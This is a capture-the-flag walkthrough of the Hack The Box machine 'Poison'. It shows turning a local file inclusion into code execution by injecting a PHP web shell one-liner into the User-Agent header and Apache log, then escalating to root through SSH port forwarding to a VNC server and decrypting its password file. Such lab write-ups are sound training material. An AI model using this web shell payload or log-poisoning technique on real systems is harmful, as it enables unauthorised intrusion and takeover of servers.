Hack The Box — Poison

Poison is a Medium difficulty FreeBSD machine on Hack The Box and part of TJ Null's OSCP prep list. In this box we mainly perform a log poisoning attack to turn an LFI into RCE, then escalate privileges through a locally listening VNC server.

ENUMERATION

Ports 22 and 80 are open. Port 80 hosts a handful of .php files, listed below; you can visit them one by one.

listfiles.php shows a file on the server called pwdbackup.txt.

Let's access pwdbackup.txt by passing file=pwdbackup.txt in the URL. The content is base64 encoded, and the first line states outright that it has been encoded 13 times, so we need to decode it 13 times.

The easiest way to do so is with a script: either look for an existing python/bash script or write your own.

We can decode a base64 string with base64 -d, so what happens if we run that 13 times?

We used a ( | ) pipeline to pass the output of each command to the next; I found this trick in a random writeup of this box.

cat base64.txt | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d

We ran base64 -d 13 times and got the password.

We can also use a simple bash script to do this task.

data=$(cat base64.txt); for i in $(seq 1 13); do data=$(echo "$data" | tr -d ' ' | base64 -d); done; echo "$data"

Here seq 1 13 generates the numbers 1 to 13, so the loop body runs 13 times, and tr -d ' ' strips any stray spaces before each decode.

and we got the password.
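The same 13-layer decode in Python, as an added example that is not part of the original writeup. The sample blob is constructed here from a fake password (the real pwdbackup.txt contents are not reproduced); peel() removes a known number of layers, and peel_auto() goes a step beyond the text by peeling until the output stops decoding or stops looking like text, for the case where the note does not say how many layers there are.

```python
import base64
import binascii

# Constructed sample input (not the real pwdbackup.txt from the box): a fake
# password wrapped in 13 layers of base64, the way the note on the box describes.
SAMPLE_SECRET = b"s3cret-p4ssw0rd!"
LAYERS = 13


def wrap(data, layers):
    """Base64-encode `data` `layers` times. Used only to build the sample."""
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


SAMPLE_BLOB = wrap(SAMPLE_SECRET, LAYERS)


def peel_once(blob):
    """Remove one base64 layer.

    Whitespace and newlines are stripped first because the file on the box is
    wrapped across lines; validate=True makes non-base64 input raise instead of
    being silently skipped over.
    """
    return base64.b64decode(b"".join(blob.split()), validate=True)


def peel(blob, layers):
    """Remove exactly `layers` base64 layers (the note told us the count)."""
    for _ in range(layers):
        blob = peel_once(blob)
    return blob


def looks_like_text(data):
    """Heuristic: printable ASCII (plus tab/CR/LF) means we have reached the
    plaintext; random-looking bytes mean we decoded one layer too far."""
    return all(32 <= b < 127 or b in (9, 10, 13) for b in data)


def peel_auto(blob, max_layers=64):
    """Remove base64 layers until the result stops decoding cleanly or stops
    looking like text. Returns (plaintext, layers_removed).

    Caveat: a plaintext that happens to be valid base64 of printable bytes would
    be decoded one time too many, so when the layer count is known, use peel().
    """
    removed = 0
    while removed < max_layers:
        try:
            nxt = peel_once(blob)
        except (binascii.Error, ValueError):
            break
        if not looks_like_text(nxt):
            break
        blob, removed = nxt, removed + 1
    return blob, removed


if __name__ == "__main__":
    # Simulate the line-wrapped file as copied off the target.
    wrapped = b"\n".join(SAMPLE_BLOB[i:i + 76] for i in range(0, len(SAMPLE_BLOB), 76))
    print(peel(wrapped, LAYERS).decode())
    print(peel_auto(wrapped))
```

Run it as a script to see both decoders recover the sample; to use it on the real file, read pwdbackup.txt into `blob` and call peel(blob, 13).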

Now there are two ways to get a foothold on this machine, and I will cover both of them.

1) USING SSH

We have already found a password above, and SSH is open on our target. Moreover, there is a Local File Inclusion vulnerability on the machine and we are able to read the /etc/passwd file.

There is a user called charix; the password itself contains "charix", and the creator of this box also uses the username charix. We can simply ssh in as charix with the password we found above.

and we are in !!!

Now I will cover the second method, log poisoning, which is the intended way to solve this machine given that its name is "Poison".

2) LOG POISONING

Put simply, log poisoning is a way of turning LFI into RCE. The attacker first injects PHP code into a server log (here through a request header that the web server writes to its access log verbatim), then uses the LFI to include that log file. Because the vulnerable script pulls the file in with include() rather than just reading and echoing it, PHP parses the log, executes the injected code, and with the right payload hands us a reverse shell. For more info, refer to this article: https://dheerajdeshmukh.medium.com/get-reverse-shell-through-log-poisoning-with-the-vulnerability-of-lfi-local-file-inclusion-e504e2d41f69

As we can see below, an LFI exists and we can view /etc/passwd.

A quick search shows that on FreeBSD the Apache access log lives at

/var/log/httpd-access.log

and we can also read the log file through the LFI.

In the image below, notice that the User-Agent "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0" is being logged. Since the User-Agent is completely under our control, we can replace it with PHP that will run a command for us. All you have to do is intercept the request with Burp

and change the User-Agent field to a PHP one-liner that executes whatever we pass in the cmd parameter. The actual reverse shell command goes into cmd when we trigger the include later, not into the header itself:

<?php shell_exec($_REQUEST['cmd']);?>

shell_exec() runs the command but does not print its output, which is fine for a reverse shell; if you want to see command output in the page, use system() instead (or wrap shell_exec() in echo). Keep the payload on a single line and stick to single quotes: Apache escapes double quotes and backslashes when it writes the log, and a PHP syntax error in the log file will break every later include of it, leaving the log useless for the rest of the attack.

After editing the User-Agent, forward the request; in the response (right-hand side of Burp) you will clearly see that our code has been written into the log.

Now all we have to do is start a netcat listener and include the log file again through the LFI, this time with cmd set to a (URL-encoded) reverse shell one-liner. PHP executes the command embedded in the log and we get a reverse shell.

NOW, FINALLY, SINCE WE HAVE A LOW-PRIVILEGE SHELL, LET'S CONTINUE

We find a zip archive called secret.zip on the target. We can unzip it with the unzip command, but that gets us nowhere on its own.

Let's transfer secret.zip to our Kali box so we can take a deeper look at it. For copying files between Linux/Unix hosts we can use scp. If we unzip it and run file secret (to identify the file type), it reports Non-ISO extended-ASCII text, with no line terminator, i.e. this is not a plaintext password.

Let's run ps aux on the target to see what processes are running

and we immediately see a process called Xvnc running as root.

VNC is graphical remote access software; if we can connect to it, we get a graphical session on the target. Below, we run ps aux | grep vnc to confirm that VNC is indeed running and to pull its line out of the full listing.

We run netstat -an to look for local listening ports and see that the target is listening on ports 5801 and 5901.

A quick search shows that VNC listens on 5900 plus the display number (and on 5800 plus the display number for its built-in HTTP/Java viewer), so 5901 is display :1 and 5801 is that display's web interface. The results above show that our target's VNC server is listening on port 5901.

We want to connect to the VNC server on our target, but we cannot do it directly: it is bound to the target's loopback interface, so it is not reachable from the network at all (and a firewall would block it even if it were). Let's use SSH local port forwarding to forward the target's VNC port 5901 to port 5000 on our Kali box. To do so, we run the following command:

ssh -L [local-port]:[remote-ip]:[remote-port] [user]@[target]
ssh -L 5000:127.0.0.1:5901 charix@10.10.10.84

LOCAL PORT FORWARDING USING SSH

The above command opens a listening socket on port 5000 on localhost of my attack machine (Kali). Whenever a connection is made to port 5000, it is forwarded over the SSH channel to port 5901 on localhost of the target (Poison), i.e. to the loopback-only VNC server.

Let's run netstat -an again, this time on our attack machine, and we see that it is now listening on port 5000. We did this just to confirm the forward is in place.

Finally, let's connect to the VNC session through our Kali's port 5000 (127.0.0.1:5000). To access VNC we use vncviewer, which comes pre-installed in Kali. When it asks for a password, we try charix's password (the one we used for SSH), but it fails!

We use 127.0.0.1 as the address because, thanks to the port forward, the VNC server is now reachable locally on our Kali's port 5000.

If you look up how vncviewer handles passwords, you will find that it can read a VNC password file via the -passwd option.

Let's use the secret file we found earlier as the password file, and it works!!! (I found this very tricky as well.)

and we are finally connected to VNC and can grab the root flag

BONUS (Decrypting VNC Password)

Since we know the secret file contains the hidden password, why not recover it in plain text? VNC password files are DES-encrypted under a fixed, publicly known key, so a small python script from GitHub that decrypts VNC password files is all we need.

Once downloaded, just run it with the -d (decrypt) and -f (file) options

The vnc password is VNCP@$$!

CONCLUSION

I hope you learned a lot from this writeup. This machine was really informative: we learned about LFI to RCE using a log poisoning attack, local port forwarding, connecting to VNC, and decrypting a VNC password file. I would like to give credit to Rana Khalil for her informative writeup.

Make sure you follow me here on Medium for more such OSCP-like writeups and articles. Until next time - ZEUS

ZeusCybersec

I am a Penetration Tester, currently pursuing OSCP. Skilled in network pen-testing and developing hacking tools using Python. I share my knowledge on YouTube.
